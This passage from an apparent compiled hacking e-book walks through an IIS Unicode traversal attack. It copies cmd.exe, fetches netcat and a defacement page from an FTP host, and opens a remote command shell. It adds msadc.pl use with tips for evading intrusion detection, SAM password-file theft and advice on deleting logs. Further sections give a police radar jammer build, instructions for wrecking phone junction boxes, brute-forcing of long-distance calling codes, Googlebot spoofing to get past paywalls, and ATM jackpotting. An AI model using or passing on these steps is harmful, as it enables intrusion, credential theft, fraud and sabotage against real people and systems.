OK, you can read the directory... what next? You have the directory listing and the ability to run commands, so you need to find the web root. By default, the web root is at:

c:\inetpub\wwwroot\

If its not there then go and look for it. Let's write a text file there and see if we can see it:

cmd.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

hmmm.. it seems that we don't have write access. Ok, no problem we can get Mail:mtahirzahid@yahoo.com

Page 358


Power Of Hacking速 around that by creating a copy of the cmd.exe that has write privileges:

cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\fug.exe

Let's check if it worked:

http://target.com/scripts/..%c0%af../winnt/system32/fug.exe?/c+dir+c:\

Yep.. all's good so far. Lets try and write to the web root:

fug.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

Let's open up it up in the browser and see if we can see it:

http://target.com/test.txt

w00t!!! Write access!!! Right, we now have some options open to us. In the words of Microsoft, where do you want to go today? Working via the URL is pretty clunky and I like the comfort of a nice command prompt, So lets do that. I want to bring over a copy of netcat and a nice html page that I'll use to replace the existing one.

First I need to think about the script I want to run that will get the files I need from my FTP server:

Mail:mtahirzahid@yahoo.com

Page 359


Power Of Hacking速 fugscript: open ftp.evilhaxor.com anonymous anon@microsoft.com cd pub get nc.exe get hacked.html quit

Right. I need to get this script onto the webserver:

fug.exe?/c+echo%20open%20ftp.evilhaxor.com>fugscript fug.exe?/c+echo%20anonymous>>fugscript fug.exe?/c+echo%20anon@microsoft.com>>fugscript fug.exe?/c+echo%20cd%20pub>>fugscript fug.exe?/c+echo%20get%20nc.exe>>fugscript fug.exe?/c+echo%20get%20hacked.html>>fugscript fug.exe?/c+echo%20quit>>fugscript

OK.. now we have created a script on the server called fugscript. Next step is to execute the script and get my files from my web server.

fug.exe?/c+ftp%20-s:fugscript

If all goes well the server should begin the FTP transfer and get your files Mail:mtahirzahid@yahoo.com

Page 360


Power Of Hacking速 transferred. Be patient and give it time to transfer. Now you are ready to get netcat listening on a port. The command line for starting netcat is:

nc.exe -l -p 6667 -e cmd.exe

This tells netcat to listen (-l) on port 6667 (-p) and to spawn cmd.exe (-e) when someone connects. The last step is to translate this command into URL speak ;-):

fug.exe?/c+nc.exe%20-l%20-p%206667%20-e%20cmd.exe

Fire up a telnet session and connect to port 6667 on the target system and voila... you have a cmd prompt. I really hate web defacements... so if your going to do it then rename the existing index.htm (or default.htm) to something like index.htm.old (give the poor admin a break, cause you can bet your arse that he hasn't made a backup). ALSO: you are now using a system without authorisation and as such, you are guilty under the Computer Misuse Act in the UK and probably of something similar in your own country. If it never occurred to you to delete the contents of c:\winnt\system32\logfiles or the 'fugscript' file then you really shouldn't be doing this.

It just wouldn't be right to talk about IIS exploitation without mentioning msadc.pl. rfp's perl script is a perfect example of exploit chaining. A Mail:mtahirzahid@yahoo.com

Page 361


Power Of Hacking速 single exploit is not used but a chain of exploits to get the script to work.

The exploit utilises a combination of inadequate application input validation and default install fun. The process tries to connect to a Data Source Name (DSN) to execute commands.

rfp's script tests for the existence /msadc/msadc.dll using the GET method. This test will be logged and you should edit the script to make it a HEAD request and add some URL obfuscation madness.

The default msadc.pl script uses "!ADM!ROX!YOUR!WORLD!" as the MIME separator string. It is advised to change this string as some IDS's are configured to identify this string.

If you want to write your own scanners then you should be looking for headers with the content type:

application/x-varg

and of course the IIS version :-) I don't want to go into too much detail because this is heavily documented on rfp's site:

http://www.wiretrip.net/rfp/

Mail:mtahirzahid@yahoo.com

Page 362


Power Of Hacking速 How do I use it? I hear you cry... well, its child's play:

./msadc2.pl -h www.target.com

If all goes well then you should be presented with the following:

command:

Its interesting to note at this point that 'cmd /c' will is run as with the previous exploit. You can edit the script to run any other executable such as 'rdsik /s' instead.

This is good, you can know enter the command you want to run on the server. The previous Unicode exploit should have given you some ideas but here's a couple that come to mind:

Example 1: copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\fug.hak

(grabbing fug.hak via your browser should give you a nice file to fire up in L0phtcrack or JTR)

Example 2: echo open ftp.evilhaxor.com>fugscript && echo fug>>fugscript && echo mypassword>>fugscript... etc. etc. Mail:mtahirzahid@yahoo.com

Page 363


Power Of Hacking速

Anyway, that's about all for now. When I can be bothered I'll add some more methods to this file. Until then, ensure your box is fully patched and the default scripts are removed. Go have a look at the following URL and get secure:

http://www.microsoft.com/security/

Rename extention with .bat You all downloaded some game or app once that was 50 parts big, and you had to rename them all from .bmp to .rar to extract them.

You can easily create a batch file that does that for you.

Open Notepad

fill in the notepad:

CODE

ren *.bmp *.rar

Mail:mtahirzahid@yahoo.com

Page 364


Power Of Hacking® Ofcourse, you have to edit these two extensions to fit the files you want to convert. Save this file as renamer.bat and run it in the directory where you want to rename your downloads. Rename extension How to Rename File Extensions

A lot of people here may ask how to rename a file extension in windows; well it‟s very simple and takes little of your time. There are two ways to rename a file extension „without‟ a stupid program.

Number 1, Folder Options:

Go into your Control Panel, in my case I use Windows XP so I would press [Start then Control Panel]. Now that you figured out how to get in Control Panel open “Folder Options” and click the view tab and make sure „Hide file extensions for know files‟ is not selected, then press Ok.

Now go into a folder and notice you can see your files extensions, rename them to whatever you'd like, for instance:

Code: Dildos.exe to Dildos.Anonymous / Etc,Etc,Etc

Number 2, MS-DOS:

The difference between renaming files in DOS is that you can rename multiple files rather then one at a time, therefore making time gracious. Here I‟ll provide you a few examples. Mail:mtahirzahid@yahoo.com

Page 365


Power Of Hacking®

Go to your start menu and open run, then type “cmd” without parenthesis. Ok you‟re in MS-DOS right? Geesh common man I know a 5 year old that can do it. Ok good your in? Excellent… Ok now find out which directory has your files and type:

Example

cd C:\Files\

In your case “C:\Files\” may not exist, so type in the directory that your have you files in. If everything goes will dos will look kinda like this:

Code: Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\User>cd C:\Files\

If all fails, you perhaps didn‟t type in the correct folder/name and it will look like this:

Code: C:\Documents and Settings\User> >cd C:\Filse\ The system cannot find the path specified.

Mail:mtahirzahid@yahoo.com

Page 366


Power Of Hacking速

Did you get in the directory yet????? If not I recommend you stick with the first step and hang yourself. Oh your in? OK COOL, type: dir and you will be provided with what files are in your folder, including their extensions. In my case:

Code: C:\Files>dir Volume in drive C has no dildo. Volume Serial Number is CXXX-XXXX

Directory of C:\Files

02/01/2005 07:22 PM

<DIR>

.

02/01/2005 07:22 PM

<DIR>

..

01/31/2005 06:40 PM

14,336 stf.bmp

01/31/2005 06:40 PM

14,336 stf02.bmp

2 File(s)

28,672 bytes

2 Dir(s) 39,024,766,976 bytes free

C:\Files>

Did you notice how I had two files named stf. Since both of these files have the same extension, *.bmp they can be renamed all together. If there are other files in there witht he same extension and you don't want to rename them, move them to another folder and / or directory.

Last but not least, after listening to my horrific grammar type: Mail:mtahirzahid@yahoo.com

Page 367


Power Of Hacking速

Code: C:\Files>ren *.bmp *.rar

And your results are: Code:

C:\Files>dir Volume in drive C has no penis. Volume Serial Number is CXXX-XXXX

Directory of C:\Files

02/01/2005 07:37 PM

<DIR>

.

02/01/2005 07:37 PM

<DIR>

..

01/31/2005 06:40 PM

14,336 stf.rar

01/31/2005 06:40 PM

14,336 stf02.rar

2 File(s)

28,672 bytes

2 Dir(s) 39,024,676,864 bytes free

C:\Files>] Restrict login hour allow To restrict a users logon hours , use the net user command. These commands are used from the Command Prompt. (Start - RUN - and type cmd)

Mail:mtahirzahid@yahoo.com

Page 368


Power Of Hacking速

Below are some examples:

1 - net user Joanna /time:M-F,08:00-17:00

2 - net user Ninja /time:M-F,8am-5pm

3 - net user Echelon /time:M,4am-5pm;T,1pm-3pm;W-F,8:00-17:00

4 - net user Shine /time:all (this one means this user can always log on)

Note:You can only restrict when a user can log on to the system. On a stand alone computer, there is no way to force a user to log off when their hours expire, without a third party script or software. Secrets backdoors in many sites Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first.... The lesson you should have learned here is: Obviously Google can go where you can't.

Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE. In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure. Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.

Mail:mtahirzahid@yahoo.com

Page 369


Power Of Hacking速 How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Intern et Settings\5.0\User Agent] @="Googlebot/2.1" "Compatible"="+http://www.googlebot.com/bot.html"

Voila! You're done!

You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site... To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Intern et Settings\5.0\User Agent] @="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Ps: Opera allows for on-the-fly switching of User Agents through its "Browser Identification" function, while for Mozilla/FireFox browsers a switching utility is available as an installable extension from this url: help://chrispederick.myacen.com/work/firefox/useragentswitcher/download/ telnet 25 Network solutions shut down that nifty telnet thing on whois.intenic.net on the default telnet port (25), despite many protests. However, there is something fun you can do with telnet with Mail:mtahirzahid@yahoo.com

Page 370


Power Of Hacking速 whois.internic.net or any other cooperating domain name server. At your DOS prompt in Windows (search for command.com or cmd.exe to run a DOS prompt) or teminal prompt (shell) in Linux or Unix, type: telnet whois.internic.net 43 It gives a blank page. Type in the domain name you want to check and hit enter. Voila! You get something like this: Whois Server Version 1.3 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: TECHBROKER.COM Registrar: NETWORK SOLUTIONS, INC. Whois Server: whois.networksolutions.com Referral URL: http://www.networksolutions.com Name Server: DNS1.WURLD.NET Name Server: DNS2.WURLD.NET Status: ACTIVE Updated Date: 11-dec-2002 Creation Date: 13-feb-1996 Expiration Date: 14-feb-2006 >>> Last update of whois database: Fri, 14 Nov 2003 07:28:09 EST <<< NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. Highway radar jamming Most drivers wanting to make better time on the open road will invest in one of those expensive radar detectors. However, this device will not work against a gun type radar unit in which the radar signal is not present until the cop has your car in his sights and pulls the trigger. Then it is TOO LATE for you to slow down. A better method is to continuously jam any signal with a radar signal of your own. I have tested this idea with the cooperation of a local cop and found that his unit reads random numbers when my car approached him. It is suprisingly easy to make a low power radar transmitter. A nifty little semiconductor called a Gunn Diode will generate microwaves when supplied with the 5 to 10 volt DC and enclosed in the correct size cavity (resonater). An 8 to 3 terminal regulator can be used to get this voltage from a Mail:mtahirzahid@yahoo.com

Page 371


Power Of Hacking速 car's 12v system. However, the correct construction and tuning of the cavity is difficult without good microwave measurement equipment. Police radars commonly operate on the K band at 22 ghz. Or more often on the X band at 10.525 ghz. most microwave intruder alarms and motion detectors (mounted over automatic doors in supermarkets & banks, etc.) contain a Gunn type transmitter/receiver combination that transmits about 10 kilowatts at 10.525 ghz. These units work perfectly as jammers. If you cannot get one locally, write to Microwave Associates in Burlington, Massachusettes and ask them for info on 'Gunnplexers' for ham radio use. When you get the unit it may be mounted in a plastic box on the dash or in a weather-proff enclosure behind the PLASTIC grille. Switch on the power when on an open highway. The unit will not jam radar to the side or behind the car so don't go speeding past the radar trap. An interesting phenomena you will notice is that the drivers who are in front of you who are using detectors will hit their brakes as you approach large metal signs and bridges. Your signal is bouncing off of these objects and triggering their radar detectors!

HAVE FUN!

P.S. If you are interested in this sort of thing, get a copy of POPULAR COMMUNICATIONS. The ads in there tell you where you can get all kinds of info on all kinds of neat equipment for all kinds of neat things! Phone related vandalism If you live where there are underground lines then you will be able to ruin someone's phone life very easily. All you must do is go to their house and find the green junction box that interfaces their line (and possibly some others in the neighborhood) with the major lines. These can be found just about anywhere but they are usually underneath the nearest phone pole. Take a socket wrench and loosen the nut on the right. Then just take clippers or a sledge hammer or a bomb and destroy the insides and pull up their phone cable. Now cut it into segments so it can't be fixed but must be replaced (There is a week's worth of work for 'em!!) Another place to phuck with lines is in new developments. When houses/apartments/condos are still in the plywood and dirt stage, Mail:mtahirzahid@yahoo.com

Page 372


Power Of Hacking速 the lines are run into junxion boxes. When the crew goes home for the day, plan your attack. Just destroy the shit out of the box, then replace the cover. Watch em' go nuts as they try to figure out where the line broke in the walls <DUH!> ! Hacking Tutorial What is hacking? ---------------According to popular belief the term hacker and hacking was founded at mit it comes from the root of a hack writer,someone who keeps "hacking" at the typewriter until he finishes the story.a computer hacker would be hacking at the keyboard or password works. What you need: -------------To hack you need a computer equipped with a modem (a device that lets you transmit data over phone lines) which should cost you from $100 to $1200. How do you hack? ---------------Hacking recuires two things: 1. The phone number 2. Answer to identity elements How do you find the phone #? ---------------------------There are three basic ways to find a computers phone number. 1. Scanning, 2. Directory 3. Inside info. What is scanning? ----------------Scanning is the process of having a computer search for a carrier tone. For example,the computer would start at (800) 111-1111 and wait for carrier if there is none it will go on to 111-1112 etc.if there is a carrier it will record it for future use and continue looking for more. Mail:mtahirzahid@yahoo.com

Page 373


Power Of Hacking速

What is directory assictance? ----------------------------This way can only be used if you know where your target computer is. For this example say it is in menlo park, CA and the company name is sri. 1. Dial 411 (or 415-555-1212) 2. Say "Menlo park" 3. Say "Sri" 4. Write down number 5. Ask if there are any more numbers 6. If so write them down. 7. Hang up on operator 8. Dial all numbers you were given 9. Listen fir carrier tone 10. If you hear carrier tone write down number, call it on your modem and your set to hack! The Basics of Hacking II Basics to know before doing anything, essential to your continuing career as one of the elite in the country... This article, "the introduction to the world of hacking" is meant to help you by telling you how not to get caught, what not to do on a computer system, what type of equipment should I know about now, and just a little on the history, past present future, of the hacker. Welcome to the world of hacking! We, the people who live outside of the normal rules, and have been scorned and even arrested by those from the 'civilized world', are becomming scarcer every day. This is due to the greater fear of what a good hacker (skill wise, no moral judgements here)|can do nowadays, thus causing anti- hacker sentiment in the masses. Also, few hackers seem to actually know about the computer systems they hack, or what equipment they will run into on the front end, or what they could do wrong on a system to alert the 'higher' authorities who monitor the system. This article is intended to tell you about some things not to do, even before you get on the system. I will tell you about the new wave of front end security devices that are beginning to be used on computers. Mail:mtahirzahid@yahoo.com

Page 374


Power Of Hacking速 I will attempt to instill in you a second identity, to be brought up at time of great need, to pull you out of trouble. And, by the way, I take no, repeat, no, responcibility for what we say in this and the forthcoming articles. Enough of the bullshit, on to the fun: after logging on your favorite bbs, you see on the high access board a phone number! It says it's a great system to "fuck around with!" This may be true, but how many other people are going to call the same number? So: try to avoid calling a number given to the public. This is because there are at least every other user calling, and how many other boards will that number spread to? If you call a number far, far away, and you plan on going thru an extender or a re-seller, don't keep calling the same access number (I.E. As you would if you had a hacker running), this looks very suspicious and can make life miserable when the phone bill comes in the mail. Most cities have a variety of access numbers and services, so use as many as you can. Never trust a change in the system... The 414's, the assholes, were caught for this reason: when one of them connected to the system, there was nothing good there. The next time, there was a trek game stuck right in their way! They proceded to play said game for two, say two and a half hours, while telenet was tracing them! Nice job, don't you think? If anything looks suspicious, drop the line immediately!! As in, yesterday!! The point we're trying to get accross is: if you use a little common sence, you won't get busted. Let the little kids who aren't smart enough to recognize a trap get busted, it will take the heat off of the real hackers. Now, let's say you get on a computer system... It looks great, checks out, everything seems fine. Ok, now is when it gets more dangerous. You have to know the computer system to know what not to do. Basically, keep away from any command something, copy a new file into the account, or whatever! Always leave the account in the same status you logged in with. Change *nothing*... If it isn't an account with priv's, then don't try any commands that require them! All, yes all, systems are going to be keeping log files of what users are doing, and that will show up. It is just like dropping a trouble-card in an ESS system, after sending that nice operator a pretty tone. Spend no excessive amounts of time on the account in one stretch. Keep your calling to the very late night ifpossible, or during business hours (believe it or not!). It so happens Mail:mtahirzahid@yahoo.com

Page 375


Power Of Hacking速 that there are more users on during business hours, and it is very difficult to read a log file with 60 users doing many commnds every minute. Try to avoid systems where everyone knows each other, don't try to bluff. And above all: never act like you own the system, or are the best there is. They always grab the people who's heads swell... There is some very interesting front end equipment around nowadays, but first let's define terms... By front end, we mean any device that you must pass thru to get at the real computer. There are devices that are made to defeat hacker programs, and just plain old multiplexers. To defeat hacker programs, there are now devices that pick up the phone and just sit there... This means that your device gets no carrier, thus you think there isn't a computer on the other end. The only way around it is to detect when it was picked up. If it pickes up after the same number ring, then you know it is a hacker-defeater. These devices take a multi-digit code to let you into the system. Some are, in fact, quite sophisticated to the point where it will also limit the user name's down, so only one name or set of names can be valid logins after they input the code... Other devices input a number code, and then they dial back a pre-programmed number for that code. These systems are best to leave alone, because they know someone is playing with their phone. You may think "but i'll just reprogram the dial-back." Think again, how stupid that is... Then they have your number, or a test loop if you were just a little smarter. If it's your number, they have your balls (if male...), If its a loop, then you are screwed again, since those loops are *monitored*. As for multiplexers... What a plexer is supposed to do is this: The system can accept multiple users. We have to time share, so we'll let the front-end processor do it... Well, this is what a multiplexer does. Usually they will ask for something like "enter class" or "line:". Usually it is programmed for a double digit number, or a four to five letter word. There are usually a few sets of numbers it accepts, but those numbers also set your 300/1200/2400 baud data type. These multiplexers are inconvenient at best, so not to worry. A little about the history of hacking: hacking, by my definition, means a great knowledge of some special area. Doctors and lawyers are hackers of a sort, by this definition. But most often, it is Mail:mtahirzahid@yahoo.com

Page 376


Power Of Hacking速 being used in the computer context, and thus we have a definition of "anyone who has a great amount of computer or telecommunications knowledge." You are not a hacker because you have a list of codes... Hacking, by my definition, has then been around only about 15 years. It started, where else but, mit and colleges where they had computer science or electrical engineering departments. Hackers have created some of the best computer languages, the most awesome operating systems, and even gone on to make millions. Hacking used to have a good name, when we could honestly say "we know what we are doing". Now it means (in the public eye): the 414's, ron austin, the nasa hackers, the arpanet hackers... All the people who have been caught, have done damage, and are now going to have to face fines and sentences. Thus we come past the moralistic crap, and to our purpose: educate the hacker community, return to the days when people actually knew something... ########################################################################## # #

# The Remote Informer

#

# #

#------------------------------------------------------------------------# #

Reader supported newsletter for the underworld

#

#------------------------------------------------------------------------# # #

# Editors: Tracker and Norman Bates

#

#

#

#================================================================= =======# # September 1987

Issue: 01 #

#================================================================= =======# #

The Headlines

#

#------------------------------------------------------------------------# #

1) Introduction

#

2) Hacking Sprint: The Easy Way

#

#

3) Rumors: Why spread them?

#

#

4) The New Sprint FON Calling Cards

#

#

5) Automatic Number Identifier (ANI)

#

Mail:mtahirzahid@yahoo.com

#

Page 377


Power Of Hacking速 ########################################################################## Introduction -------------------------------------------------------------------------Welcome to the first issue of 'The Remote Informer'! This newsletter is reader supported. If the readers of this newsletter do not help support it, then it will end. We are putting this out to help out the ones that would like to read it. If you are one of those who thinks they know everything, then don't bother reading it. This newsletter is not anything like the future issues. The future issues will contain several sections, as long as reader input is obtained. Below is an outline overview of the sections in the future issues. I/O Board (Input/Output Board) The I/O Board is for questions you have, that we might be able to answer or atleast refer you to someone or something. We will be honest if we cannot help you. We will not make up something, or to the effect, just to make it look like we answered you. There will be a section in the I/O Board for questions we cannot answer, and then the readers will have the opportunity to answer it. We will print anything that is reasonable in the newsletter, even complaints if you feel like you are better than everyone. NewsCenter This section will be for news around the underworld. It will talk of busts of people in the underworld and anything else that would be considered news. If you find articles in the paper, or something happens in your local area, type it up, and upload it to one of the boards listed at the end of the newsletter. Your handle will be placed in the article. If you do enter a news article, please state the date and from where you got it. Feature Section The Feature Section will be the largest of the sections as it will be Mail:mtahirzahid@yahoo.com

Page 378


Power Of Hacking速 on the topic that is featured in that issue. This will be largely reader input which will be sent in between issues. At the end of the issue at hand, it will tell the topic of the next issue, therefore, if you have something to contribute, then you will have ample time to prepare your article. Hardware/Software Review In this section, we will review the good and bad points of hardware and software related to the underworld. It will be an extensive review, rather than just a small paragraph. The Tops This section will be the area where the top underworld BBS's, hacking programs, modem scanners, etc. will be shown. This will be reader selected and will not be altered in anyway. The topics are listed below. Underworld BBS's (Hack, Phreak, Card, Anarchy, etc.) Hacking programs for Hayes compatables Hacking programs for 1030/Xm301 modems Modem scanners for Hayes compatables Modem scanners for 1030/Xm301 modems Other type illegal programs You may add topics to the list if enough will support it. Tid Bits This will contain tips and helpful information sent in by the users. If you have any information you wish to contribute, then put it in a text file and upload it to one of the BBS's listed at the end of the newsletter. Please, no long distance codes, mainframe passwords, etc. We may add other sections as time goes by. This newsletter will not be put out on a regular basis. It will be put out when we have enough articles and information to put in it. There may be up to 5 a month, but there will always be at least one a month. We would like you, the readers, to send us anything you feel would be of interest to others, like hacking hints, methods of hacking long distance companies, companies to card from, Mail:mtahirzahid@yahoo.com

Page 379


Power Of Hacking速 etc. We will maintain the newsletter as long as the readers support it. That is the end of the introduction, but take a look at this newsletter, as it does contain information that may be of value to you. ================================================================== ======== Hacking Sprint: The Easy Way ------------------------------------------------------------------------By: Tracker If you hack US Sprint, 950-0777 (by the way it is no longer GTE Sprint), and you are fustrated at hacking several hours only to find one or two codes, then follow these tips, and it will increase your results tremendously. First, one thing that Mr. Mojo proved is that Sprint will not store more than one code in every hundred numbers. (ex: 98765400 to 98765499 may contain only one code). There may NOT be a code in that hundred, but there will never be more than one. Sprint's 9 digit codes are stored from 500000000 through 999999999. In the beginning of Sprint's 950 port, they only had 8 digit codes. Then they started converting to 9 digit codes, storing all 8 digit codes between 10000000 and 49999999 and all 9 digit codes between 500000000 and 999999999. Sprint has since cancelled most 8 digit codes, although there are a few left that have been denoted as test codes. Occaisionally, I hear of phreaks saying they have 8 digit codes, but when verifying them, the codes were invalid. Now, where do you start? You have already narrowed the low and high numbers in half, therefore already increasing your chances of good results by 50 percent. The next step is to find a good prefix to hack. By the way, a prefix, in hacking terms, is the first digits in a code that can be any length except the same number of digits the code is. (ex: 123456789 is a code. That means 1, 12, 123, 1234, 12345, 123456, 1234567, and 12345678 are prefixes) The way you find a good prefix to hack is to manually enter a code prefix. If when you enter the code prefix and a valid destination number and you do not hear the ringing of the recording telling you that the code is invalid until near the end of the number, then you know the prefix is valid. Here is a chart to follow when doing this: Code

- Destination

Range good codes exist

Mail:mtahirzahid@yahoo.com

Page 380


Power Of Hacking速 ------------------------------------------------123456789 - 6192R

123400000 - 123499999

123456789 - 619267R 123456789 - 61926702R

123450000 - 123459999 123456000 - 123456999

123456789 - 6192670293R

123456700 - 123456799

------------------------------------------------( R - Denotes when ring for recording starts) To prove this true, I ran a test using OmniHack 1.3p, written by Jolly Joe. In this test I found a prefix where the last 3 digits were all I had to hack. I tested each hundred of the 6 digit prefix finding that all but 4 had the ring start after the fourth digit was dialed in the destination number. The other four did not ring until I had finished the entire code. I set OmniHack to hack the prefix + 00 until prefix + 99. (ex: xxxxxxy00 to xxxxxxy99: where y is one of the four numbers that the ring did not start until the dialing was completed.) Using this method, I found four codes in a total of 241 attempts using ascending hacking (AKA: Sequential). Below you will see a record of my hack: Range of hack

Codes found

Tries

---------------------------------------------xxxxxx300 - xxxxxx399

xxxxxx350

50

xxxxxx500 - xxxxxx599

xxxxxx568

68

xxxxxx600 - xxxxxx699

xxxxxx646

46

xxxxxx800 - xxxxxx899

xxxxxx877

77

---------------------------------------------Totals

4 codes

241

As you see, these methods work. Follow these guidlines and tips and you should have an increase in production of codes in the future hacking Sprint. Also, if you have any hints/tips you think others could benefit from, then type them up and upload them to one of the boards at the end of the newsletter. ================================================================== ======== Rumors: Why Spread Them? -------------------------------------------------------------------------Do you ever get tired of hearing rumors? You know, someone gets an urge to impress others, so they create a rumor that some long distance Mail:mtahirzahid@yahoo.com

Page 381


Power Of Hacking速 company is now using tracing equipment. Why start rumors? It only scares others out of phreaking, and then makes you, the person who started the rumor, look like Mr. Big. This article is short, but it should make you aware of the rumors that people spread for personal gain. The best thing to do is to denote them as a rumor starter and then leave it at that. You should not rag on them constantly, since if the other users cannot determine if it is fact or rumor, then they should suffer the consequences. ================================================================== ======== The New Sprint FON Calling Cards -------------------------------------------------------------------------By: Tracker US Sprint has opened up a new long distance network called the Fiber Optic Network (FON), in which subscribers are given calling cards. These calling cards are 14 digits, and though, seem randomly generated, they are actually encrypted. The rumors floating around about people getting caught using the Sprint FON calling cards are fact, not rumors. The reason people are getting caught is that they confuse the FON calling cards with the local 950 port authorization codes. If you will remember, you never use AT&T calling cards from you home phone. It has ANI capability, which is not tracing, but rather the originating phone number is placed on the bill as soon as the call is completed. They know your phone number when you call the 800 access port, but they do not record it until your call is completed. Also, through several of my hacks, I came up with some interesting information surrounding the new Sprint network. They are listed below. 800-877-0000 This number is for information on US Sprint's 800 calling card service. I have not played around with it, but I believe it is for trouble or help with the FON calling cards. I am not sure if it is for subscribing to the FON network. 800-877-0002 - You hear a short tone, then nothing. 800-877-0003 - US Sprint Alpha Test Channel #1 800-877-(0004-0999) When you call these numbers, you get a recording saying: "Welcome to US Sprint's 1 plus service." When the recording stops, if you hit the Mail:mtahirzahid@yahoo.com

Page 382


Power Of Hacking速 pound key (#) you will get the calling card dial tone. Other related Sprint numbers 800-521-4949 This is the number that you subscribe to US Sprint with. You may also subscribe to the FON network on this number. It will take 4 to 5 weeks for your calling card to arrive. 10777 This is US Sprint's equal access number. When you dial this number, you then dial the number you are calling, and it will be billed through US Sprint, and you will receive their long distance line for that call. Note that you will be billed for calls made through equal access. Do not mistake it to be a method of phreaking, unless used from a remote location. If you are in US Sprint's 1+ service then call 1+700-555-1414, which will tell you which long distance company you are using. When you hear: "Thank you for choosing US Sprint's 1 plus service," hit the pound key (#), and then you will get the US Sprint dial tone. This however is just the same as if you are calling from your home phone if you dial direct, so you would be billed for calls made through that, but there are ways to use this to your advantage as in using equal access through a PBX. ================================================================== ======== Automatic Number Identification (ANI) --------------------------------------------------------------------------

The true definition for Automatic Number Identification has not been widely known to many. Automatic Number Identification, (AKA: ANI), is the process of the destination number knowing the originating number, which is where you are calling from. The method of achieving this is to send the phone number that you are calling from in coded form ahead of the destination number. Below is an example of this. ANI Method Dial: 267-0293 Sent: ********2670293 * - Denotes the originating number which is coded and sent before the number As you noticed there are 8 digits in the coded number. This is Mail:mtahirzahid@yahoo.com

Page 383


Power Of HackingŽ because, at least I believe, it is stored in a binary-like form. Automatic Number Identification means a limited future in phreaking. ANI does not threaten phreaking very much yet, but it will in the near future. A new switching system will soon be installed in most cities that are covered by ESS, Electronic Switching System, now. The system will have ANI capabilities which will be supplied to the owners of phone lines as an›added extra. The owner's phone will have an LED read-out that will show the phone number of the people that call you. You will be able to block some numbers, so that people cannot call you. This system is in the testing stages currently, but will soon be installed across most of the country. As you see, this will end a large part of phreaking, until we, the phreakers, can come up with an alternative. As I have been told by several, usually reliable, people, this system is called ISS, which I am not sure of the meaning of this, and is being tested currently in Rhode Island. 800 in-watts lines set up by AT&T support ANI. The equipment to decode an ANI coded origination number does not costs as much as you would expect. 950 ports do not offer ANI capability, no matter what you have been told. The 950 ports will only give the city in which they are based, this usually being the largest in the state, sometimes the capitol. One last thing that I should tell you is that ANI is not related to tracing. Tracing can be done on any number whether local, 950, etc. One way around this, especially when dialing Alliance TeleConferencing, is to dial through several extenders or ports. ANI will only cover the number that is calling it, and if you call through a number that does not support ANI, then your number will never be known. ================================================================== ======== The Disclaimer! -------------------------------------------------------------------------We, the editors, take no responsibility for your actions and use of the information in this newsletter. This newsletter is for informational purposes only. There will never be any long distance codes, passwords, etc. in this newsletter. If you are easily offended by telecommunication discussions, then we suggest that you not read this newsletter. But for those who are truely interested in the information in this newsletter, Mail:mtahirzahid@yahoo.com

Page 384


Power Of Hacking速 enjoy it. Jackpotting ATM Machines JACKPOTTING was done rather successfully a while back in (you guessed it) New York. What the culprits did was: Sever (actually cross over) the line between the ATM and the host. insert a microcomputer between the ATM and the host. insert a fradulent card into the ATM. (card=cash card, not hardware) What the ATM did was: send a signal to the host, saying "Hey! Can I give this guy money, or is he broke, or is his card invalid?" What the microcomputer did was: intercept the signal from the host, discard it, send "there's no one using the ATM" signal. What the host did was: get the "no one using" signal, send back "okay, then for God's sake don't spit out any money!" signal to ATM. What the microcomputer did was: intercept signal (again), throw it away (again), send "Wow! That guy is like TOO rich! Give him as much money as he wants. In fact, he's so loaded, give him ALL the cash we have! He is really a valued customer." signal. What the ATM did: what else? Obediently dispense cash till the cows came home (or very nearly so). What the crooks got: well in excess of $120,000 (for one weekend's work), and several years when they were caught. This story was used at a CRYPTOGRAPHY conference I attended a while ago to demonstrate the need for better information security. The lines between ATM's & their hosts are usually 'weak' in the sense that the information transmitted on them is generally not encrypted in any way. One of the ways that JACKPOTTING can be defeated is to encrypt the information passing between the ATM and the host. As long as the key cannot be determined from the ciphertext, the transmission (and hence the transaction) is secure. A more believable, technically accurate story might concern a person who uses a computer between the ATM and the host to determine the key before actually fooling the host. As everyone knows, people find cryptanalysis a very exciting and engrossing subject...don't they? Mail:mtahirzahid@yahoo.com

Page 385


Power Of Hacking速 (Hee-Hee) _____

______

| |-<<-| |-<<-| | |ATM| micro

|Host|

